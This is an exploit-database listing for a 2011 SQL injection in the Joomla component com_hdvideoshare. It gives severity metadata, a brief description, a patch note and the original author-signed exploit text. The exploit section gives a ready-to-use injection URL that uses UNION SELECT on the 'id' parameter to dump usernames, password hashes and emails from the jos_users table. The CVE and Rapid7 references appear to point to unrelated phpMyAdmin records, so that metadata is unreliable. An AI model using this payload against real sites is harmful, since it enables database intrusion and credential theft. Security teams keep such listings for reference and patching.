header-logo
Suggest Exploit
vendor:
Joomla
by:
Snakespc
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: Joomla 1.5.x
Affected Version To: Joomla 1.5.x
Patch Exists: YES
Related CWE: CVE-2011-4107
CPE: a:joomla:joomla
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-1f6ee708-0d22-11e1-b5bd-14dae938ec40/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2011-4107/https://www.rapid7.com/db/vulnerabilities/phpmyadmin-cve-2011-4107/https://www.rapid7.com/db/vulnerabilities/suse-cve-2011-4107/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2011

Joomla com_hdvideoshare Remote Sql Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. This vulnerability exists in the Joomla component com_hdvideoshare, due to insufficient sanitization of user-supplied input in the 'id' parameter. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL queries.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

==============================================================================
[»] Joomla com_hdvideoshare Remote Sql Injection Vulnerability
==============================================================================
   
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
   
###########################################################################
 ===[ Exploit ]===
   
[»] http://server/index.php?option=com_hdvideoshare&view=player&id=-45+UNION SELECT concat(username,0x3a,password,0x3a,email),2,3,4+from+jos_users
[»]Author: Snakespc <-
###########################################################################

Navigation

Suggest Exploit

Services By CQR